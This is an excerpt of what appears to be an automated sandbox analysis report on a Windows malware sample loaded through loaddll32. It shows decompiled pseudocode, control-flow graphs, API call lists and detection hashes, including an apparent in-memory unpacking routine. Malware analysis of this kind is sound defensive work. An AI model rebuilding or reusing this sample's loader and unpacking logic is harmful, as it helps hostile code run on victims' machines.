                                          • StrTrimA.SHLWAPI(?,00C7C28C,00000002,?,?,?,00C74C85,031395AC,?,?,?,00C74A8B,?,?,?,4D283A53), ref: 00C77CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,00C74C85,031395AC,?,?,?,00C74A8B,?,?,?,4D283A53,?), ref: 00C77CB9
                                          • StrTrimA.SHLWAPI(00000001,00C7C28C,?,?,?,00C74C85,031395AC,?,?,?,00C74A8B,?,?,?,4D283A53,?), ref: 00C77CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: 180aebb6c0b4e4e05d82e043c11a32f7f69fbc1562aaef26c47fcf754b47acbb
                                          • Instruction ID: f625ba4e12ceb5e0ff3d20e05d711f48e7b7cfef25835a297413ed06e9b89096
                                          • Opcode Fuzzy Hash: 180aebb6c0b4e4e05d82e043c11a32f7f69fbc1562aaef26c47fcf754b47acbb
                                          • Instruction Fuzzy Hash: 7201B5716093265BD2229F668C88F2BBE9CEF59B60F118618F859C7251DB60C80192F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C74908, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 314 c74908-c74922 call c711af 317 c74924-c74932 314->317 318 c74938-c74946 314->318 317->318 320 c74958-c74973 call c71111 318->320 321 c74948-c7494b 318->321 327 c74975-c7497b 320->327 328 c7497d 320->328 321->320 322 c7494d-c74952 321->322 322->320 324 c74adb 322->324 326 c74add-c74ae2 324->326 329 c74983-c74998 call c71ec4 call c71a4e 327->329 328->329 334 c749a3-c749a9 329->334 335 c7499a-c7499d CloseHandle 329->335 336 c749cf-c749e7 call c758be 334->336 337 c749ab-c749b0 334->337 335->334 345 c74a13-c74a15 336->345 346 c749e9-c74a11 memset RtlInitializeCriticalSection 336->346 339 c74ac6-c74acb 337->339 340 c749b6 337->340 342 c74ad3-c74ad9 339->342 343 c74acd-c74ad1 339->343 344 c749b9-c749c8 call c77827 340->344 342->326 343->326 343->342 352 c749ca 344->352 348 c74a16-c74a1a 345->348 346->348 348->339 351 c74a20-c74a36 RtlAllocateHeap 348->351 353 c74a66-c74a68 351->353 354 c74a38-c74a64 wsprintfA 351->354 352->339 355 c74a69-c74a6d 353->355 354->355 355->339 356 c74a6f-c74a8f call c793d5 call c798f7 355->356 356->339 361 c74a91-c74a98 call c7205b 356->361 364 c74a9f-c74aa6 361->364 365 c74a9a-c74a9d 361->365 366 c74abb-c74abf call c79b6f 364->366 367 c74aa8-c74aaa 364->367 365->339 371 c74ac4 366->371 367->339 368 c74aac-c74ab0 call c76cd3 367->368 372 c74ab5-c74ab9 368->372 371->339 372->339 372->366
                                          C-Code - Quality: 57%
                                          			E00C74908(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00C711AF();
				if(_t21 != 0) {
					_t59 =  *0xc7d25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0xc7d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xc7d164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00C71111( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xc7d2a4; // 0x24ba5a8
					if( *0xc7d25c > 5) {
						_t8 = _t26 + 0xc7e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0xc7ea05; // 0x44283a44
						_t27 = _t7;
					}
					E00C71EC4(_t27, _t27);
					_t31 = E00C71A4E(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0xc7d270 =  *0xc7d270 ^ 0x81bbe65d;
						_t32 = E00C758BE(0x60);
						 *0xc7d324 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xc7d324; // 0x31395b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xc7d324; // 0x31395b0
							 *_t51 = 0xc7e845;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xc7d238, 0, 0x43);
							 *0xc7d2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xc7d25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xc7d2a4; // 0x24ba5a8
								_t13 = _t58 + 0xc7e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xc7c28f);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00C793D5( ~_v8 &  *0xc7d270, 0xc7d00c); // executed
								_t42 = E00C798F7(0, _t55, _t63, 0xc7d00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E00C7205B(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00C79B6F(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E00C76CD3(__eflags,  &(_t67[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xc7d160();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E00C77827(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                          0x00c74908
                                          0x00c74912
                                          0x00c74915
                                          0x00c74918
                                          0x00c7491b
                                          0x00c74922
                                          0x00c74924
                                          0x00c74930
                                          0x00c74932
                                          0x00c74932
                                          0x00c7493b
                                          0x00c74941
                                          0x00c74946
                                          0x00c74960
                                          0x00c7496c
                                          0x00c7496e
                                          0x00c74973
                                          0x00c7497d
                                          0x00c7497d
                                          0x00c74975
                                          0x00c74975
                                          0x00c74975
                                          0x00c74975
                                          0x00c74984
                                          0x00c74991
                                          0x00c74998
                                          0x00c7499d
                                          0x00c7499d
                                          0x00c749a6
                                          0x00c749a9
                                          0x00c749cf
                                          0x00c749db
                                          0x00c749e0
                                          0x00c749e5
                                          0x00c749e7
                                          0x00c74a13
                                          0x00c74a15
                                          0x00c749e9
                                          0x00c749ed
                                          0x00c749f2
                                          0x00c749f7
                                          0x00c749fe
                                          0x00c74a04
                                          0x00c74a09
                                          0x00c74a0f
                                          0x00c74a16
                                          0x00c74a18
                                          0x00c74a1a
                                          0x00c74a29
                                          0x00c74a2f
                                          0x00c74a34
                                          0x00c74a36
                                          0x00c74a66
                                          0x00c74a68
                                          0x00c74a38
                                          0x00c74a38
                                          0x00c74a3e
                                          0x00c74a4b
                                          0x00c74a51
                                          0x00c74a51
                                          0x00c74a59
                                          0x00c74a62
                                          0x00c74a69
                                          0x00c74a6b
                                          0x00c74a6d
                                          0x00c74a74
                                          0x00c74a81
                                          0x00c74a86
                                          0x00c74a8b
                                          0x00c74a8d
                                          0x00c74a8f
                                          0x00000000
                                          0x00000000
                                          0x00c74a91
                                          0x00c74a96
                                          0x00c74a98
                                          0x00c74a9f
                                          0x00c74aa3
                                          0x00c74aa6
                                          0x00c74abb
                                          0x00c74abf
                                          0x00c74ac4
                                          0x00000000
                                          0x00c74ac4
                                          0x00c74aa8
                                          0x00c74aaa
                                          0x00000000
                                          0x00000000
                                          0x00c74ab0
                                          0x00c74ab5
                                          0x00c74ab7
                                          0x00c74ab9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c74ab9
                                          0x00c74a9c
                                          0x00c74a9c
                                          0x00c74a6d
                                          0x00c749ab
                                          0x00c749ab
                                          0x00c749b0
                                          0x00c74ac6
                                          0x00c74acb
                                          0x00c74ad3
                                          0x00c74ad3
                                          0x00000000
                                          0x00c74acb
                                          0x00c749b6
                                          0x00c749b9
                                          0x00c749c3
                                          0x00c749ca
                                          0x00000000
                                          0x00c74adb
                                          0x00c74adb
                                          0x00c74ade
                                          0x00c74ae2
                                          0x00c74ae2

                                          APIs
                                            • Part of subcall function 00C711AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,00C74920,00000001), ref: 00C711BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00C7499D
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • memset.NTDLL ref: 00C749ED
                                          • RtlInitializeCriticalSection.NTDLL(03139570), ref: 00C749FE
                                            • Part of subcall function 00C76CD3: memset.NTDLL ref: 00C76CED
                                            • Part of subcall function 00C76CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00C76D24
                                            • Part of subcall function 00C76CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00C74AB5), ref: 00C76D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00C74A29
                                          • wsprintfA.USER32 ref: 00C74A59
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: b1130845fe5629b5bde1784fa429624ac9aa6c9b2604d60db3759918c7a53b5c
                                          • Instruction ID: 335f35d0e0bbb4b37bcbf16cb09ea93b383149604d7ecdbcdb8c8723aaf8e0b8
                                          • Opcode Fuzzy Hash: b1130845fe5629b5bde1784fa429624ac9aa6c9b2604d60db3759918c7a53b5c
                                          • Instruction Fuzzy Hash: C8512471A40215AFDB24EBA4DC85B6E73BCAF08B20F14C465F61EE7191E7709E40EB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C76CD3, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 157stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 373 c76cd3-c76d1d memset call c74814 376 c76e84-c76e86 373->376 377 c76d23-c76d37 lstrlenW StrCmpNIW 373->377 380 c76e87-c76e8f 376->380 378 c76e76-c76e78 377->378 379 c76d3d-c76d4a call c79138 377->379 381 c76e79-c76e82 call c7147e 378->381 386 c76d50-c76d63 call c7a5e9 379->386 387 c76d4c 379->387 381->380 390 c76e64-c76e66 386->390 391 c76d69-c76d85 call c7a5e9 386->391 387->386 393 c76e67-c76e6d 390->393 396 c76d87-c76da8 call c774b9 call c7147e 391->396 397 c76daa-c76dac 391->397 393->381 395 c76e6f-c76e74 call c7568a 393->395 395->381 401 c76dad-c76daf 396->401 397->401 403 c76db5-c76dbc 401->403 404 c76e59-c76e62 call c7147e 401->404 407 c76e01-c76e31 call c76e92 call c76737 403->407 408 c76dbe-c76dd5 call c7a5e9 403->408 404->393 422 c76e33-c76e4e call c772f2 407->422 423 c76e50-c76e54 call c7147e 407->423 415 c76dd7-c76df8 call c774b9 call c7147e 408->415 416 c76dfa-c76dfc 408->416 419 c76dfd-c76dff 415->419 416->419 419->404 419->407 422->423 423->404
                                          C-Code - Quality: 90%
                                          			E00C76CD3(void* __eflags, WCHAR* _a4) {
				char _v40;
				char _v44;
				void _v48;
				int _v52;
				char _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr _v72;
				int _v76;
				WCHAR* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				char _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t81;
				WCHAR* _t90;

				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_v76 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0xc7d2a4; // 0x24ba5a8
				_t5 = _t40 + 0xc7ee24; // 0x410025
				_t90 = E00C74814(_t5);
				_v84 = _t90;
				if(_t90 == 0) {
					_t81 = 8;
					L24:
					return _t81;
				}
				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
				if(_t45 != 0) {
					_t81 = 1;
					L22:
					E00C7147E(_v88);
					goto L24;
				}
				if(E00C79138(0,  &_v96) != 0) {
					_v96 = 0;
				}
				_t50 = E00C7A5E9(0,  *0xc7d33c);
				_v96 = _t50;
				if(_t50 == 0) {
					_t81 = 8;
					goto L19;
				} else {
					_t52 =  *0xc7d2a4; // 0x24ba5a8
					_t11 = _t52 + 0xc7e81a; // 0x65696c43
					_t55 = E00C7A5E9(0, _t11);
					_t93 = _t55;
					if(_t55 == 0) {
						_t81 = 8;
					} else {
						_t81 = E00C774B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
						E00C7147E(_t93);
					}
					if(_t81 != 0) {
						L17:
						E00C7147E(_v92);
						L19:
						_t92 = _v96;
						if(_v96 != 0) {
							E00C7568A(_t92);
						}
						goto L22;
					} else {
						if(( *0xc7d260 & 0x00000001) == 0) {
							L14:
							E00C76E92(_t81, _v60, _v56,  *0xc7d270, 0);
							_t81 = E00C76737(_v72,  &_v64,  &_v60, 0);
							if(_t81 == 0) {
								_v68 = _v96;
								_v64 =  &_v60;
								_t81 = E00C772F2( &_v84, 0);
							}
							E00C7147E(_v60);
							goto L17;
						}
						_t67 =  *0xc7d2a4; // 0x24ba5a8
						_t18 = _t67 + 0xc7e823; // 0x65696c43
						_t70 = E00C7A5E9(0, _t18);
						_t95 = _t70;
						if(_t70 == 0) {
							_t81 = 8;
						} else {
							_t22 =  &_v96; // 0x65696c43
							_t81 = E00C774B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
							E00C7147E(_t95);
						}
						if(_t81 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}




























                                          0x00c76ce9
                                          0x00c76ced
                                          0x00c76cf4
                                          0x00c76cfc
                                          0x00c76cfd
                                          0x00c76cfe
                                          0x00c76cff
                                          0x00c76d00
                                          0x00c76d01
                                          0x00c76d09
                                          0x00c76d15
                                          0x00c76d17
                                          0x00c76d1d
                                          0x00c76e86
                                          0x00c76e87
                                          0x00c76e8f
                                          0x00c76e8f
                                          0x00c76d2f
                                          0x00c76d37
                                          0x00c76e78
                                          0x00c76e79
                                          0x00c76e7d
                                          0x00000000
                                          0x00c76e7d
                                          0x00c76d4a
                                          0x00c76d4c
                                          0x00c76d4c
                                          0x00c76d58
                                          0x00c76d5d
                                          0x00c76d63
                                          0x00c76e66
                                          0x00000000
                                          0x00c76d69
                                          0x00c76d69
                                          0x00c76d6e
                                          0x00c76d77
                                          0x00c76d7c
                                          0x00c76d85
                                          0x00c76dac
                                          0x00c76d87
                                          0x00c76da1
                                          0x00c76da3
                                          0x00c76da3
                                          0x00c76daf
                                          0x00c76e59
                                          0x00c76e5d
                                          0x00c76e67
                                          0x00c76e67
                                          0x00c76e6d
                                          0x00c76e6f
                                          0x00c76e6f
                                          0x00000000
                                          0x00c76db5
                                          0x00c76dbc
                                          0x00c76e01
                                          0x00c76e14
                                          0x00c76e2d
                                          0x00c76e31
                                          0x00c76e37
                                          0x00c76e3f
                                          0x00c76e4e
                                          0x00c76e4e
                                          0x00c76e54
                                          0x00000000
                                          0x00c76e54
                                          0x00c76dbe
                                          0x00c76dc3
                                          0x00c76dcc
                                          0x00c76dd1
                                          0x00c76dd5
                                          0x00c76dfc
                                          0x00c76dd7
                                          0x00c76de7
                                          0x00c76df1
                                          0x00c76df3
                                          0x00c76df3
                                          0x00c76dff
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c76dff
                                          0x00c76daf

                                          APIs
                                          • memset.NTDLL ref: 00C76CED
                                            • Part of subcall function 00C74814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00C76D15,00410025,00000005,?,00000000), ref: 00C74825
                                            • Part of subcall function 00C74814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00C74842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00C76D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00C74AB5), ref: 00C76D2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: 4dc1ca601fbc2a1ca73773bdff510e17ee73bd8576aa32c09ef8442acd6971e6
                                          • Instruction ID: 05047b28db33c1f0a839bd8794cf2b4bb96c551383c1fdfbb3a75af14e6f5fb1
                                          • Opcode Fuzzy Hash: 4dc1ca601fbc2a1ca73773bdff510e17ee73bd8576aa32c09ef8442acd6971e6
                                          • Instruction Fuzzy Hash: 2D41AD72208745AFC710AFA5DC81EAFB7ECAF88704F04892AB99DD7111D670DD049BA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C74FFA, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 00C75057
                                          • SysAllocString.OLEAUT32(00C7A6F4), ref: 00C7509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C750AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C750BD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 1c79cc5c8442053795aaafff27ca3a1e8f63fc319657bd8526cbc418ecdff4ef
                                          • Instruction ID: b25175711bc3f01929dee43c12373c82a2173dbbc1be1b93ad686354adbaa83f
                                          • Opcode Fuzzy Hash: 1c79cc5c8442053795aaafff27ca3a1e8f63fc319657bd8526cbc418ecdff4ef
                                          • Instruction Fuzzy Hash: DC31F176900609EFCB05DF98D8C49EE7BB9FF48300B10845EF90A9B251E7719A81CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F1B6F, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E005F1B6F(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t42;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed int _t61;
				intOrPtr _t78;
				void* _t79;

				_t78 =  *0x5f4130;
				_t42 = E005F1C8A(_t78,  &_v24,  &_v16);
				_v20 = _t42;
				if(_t42 == 0) {
					asm("sbb ebx, ebx");
					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t79 = _t78 + _v24;
					_v40 = _t79;
					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
					_v28 = _t49;
					if(_t49 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t61 <= 0) {
							_t50 =  *0x5f4140;
						} else {
							_t53 = _t49 - _t79;
							_v32 = _t53;
							_v36 = _t53 + _a4 + 0x5f51a2;
							_v12 = _t79;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("rol edx, cl");
								E005F1908(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								_v12 = _v12 + 0x1000;
								 *0x5f4140 = _t50;
								if(_v8 >= _t61) {
									break;
								}
								_t53 = _v32;
							}
						}
						if(_t50 != 0x59935a40) {
							_v20 = 0xc;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}





















                                          0x005f1b76
                                          0x005f1b86
                                          0x005f1b8b
                                          0x005f1b90
                                          0x005f1ba5
                                          0x005f1bac
                                          0x005f1bb1
                                          0x005f1bc2
                                          0x005f1bc5
                                          0x005f1bcb
                                          0x005f1bd0
                                          0x005f1c7a
                                          0x005f1bd6
                                          0x005f1bd6
                                          0x005f1bdc
                                          0x005f1c42
                                          0x005f1bde
                                          0x005f1be1
                                          0x005f1beb
                                          0x005f1bee
                                          0x005f1bf1
                                          0x005f1bf9
                                          0x005f1c04
                                          0x005f1c05
                                          0x005f1c06
                                          0x005f1c15
                                          0x005f1c1e
                                          0x005f1c28
                                          0x005f1c2b
                                          0x005f1c2e
                                          0x005f1c35
                                          0x005f1c3d
                                          0x00000000
                                          0x00000000
                                          0x005f1bf6
                                          0x005f1bf6
                                          0x005f1c3f
                                          0x005f1c4c
                                          0x005f1c61
                                          0x005f1c4e
                                          0x005f1c57
                                          0x005f1c5c
                                          0x005f1c72
                                          0x005f1c72
                                          0x005f1c81
                                          0x005f1c87

                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 005F1BC5
                                          • memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,005F11FF,-00000008), ref: 005F1C57
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005F1C72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFreememcpy
                                          • String ID: Dec 1 2020
                                          • API String ID: 4010158826-3539646581
                                          • Opcode ID: cf567e70921d4d9a23f4aab68fcba6521c1bf68c1b7b6542b104615728c6c742
                                          • Instruction ID: 3ade666f7c607f070aa0109c52fb079511ae6a558e3c799611b879e36ce4ec46
                                          • Opcode Fuzzy Hash: cf567e70921d4d9a23f4aab68fcba6521c1bf68c1b7b6542b104615728c6c742
                                          • Instruction Fuzzy Hash: 0B315971D4061EEBDB01CF98D885BFEBBB8BF58300F108165EA01BB250D779AA05DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C71295, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E00C71295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00C758BE(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                          0x00c712a1
                                          0x00c712a5
                                          0x00c712a6
                                          0x00c712a7
                                          0x00c712a9
                                          0x00c712ab
                                          0x00c712ae
                                          0x00c712b3
                                          0x00c7134a
                                          0x00c71351
                                          0x00c71351
                                          0x00c712bc
                                          0x00c712c3
                                          0x00c712d3
                                          0x00c712d3
                                          0x00c712d9
                                          0x00c712db
                                          0x00c712e0
                                          0x00c712e9
                                          0x00c712ef
                                          0x00c712f4
                                          0x00c712ff
                                          0x00c71303
                                          0x00c71305
                                          0x00c71306
                                          0x00c7130f
                                          0x00c71313
                                          0x00c71324
                                          0x00c71315
                                          0x00c7131a
                                          0x00c7131f
                                          0x00c7132e
                                          0x00c7132e
                                          0x00c71303
                                          0x00c71334
                                          0x00c7133a
                                          0x00c7133a
                                          0x00c71343
                                          0x00c71348
                                          0x00c71348
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: 793069f7cf250319447b05974c4738b6ea1e6fda6362cd7ce98a2ae605006c6a
                                          • Instruction ID: e96b79f14822d460f8eecb2b8c899a4164e918f9fd8ced4287140f737163ccb3
                                          • Opcode Fuzzy Hash: 793069f7cf250319447b05974c4738b6ea1e6fda6362cd7ce98a2ae605006c6a
                                          • Instruction Fuzzy Hash: 57214F7590120AEFDB11DFA8D9849DEBBB8FF48304B148169ED19E7220EB70DA41DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C790A1, Relevance: 6.0, APIs: 4, Instructions: 38sleepmemorythreadCOMMON
                                          Download Yara Rule
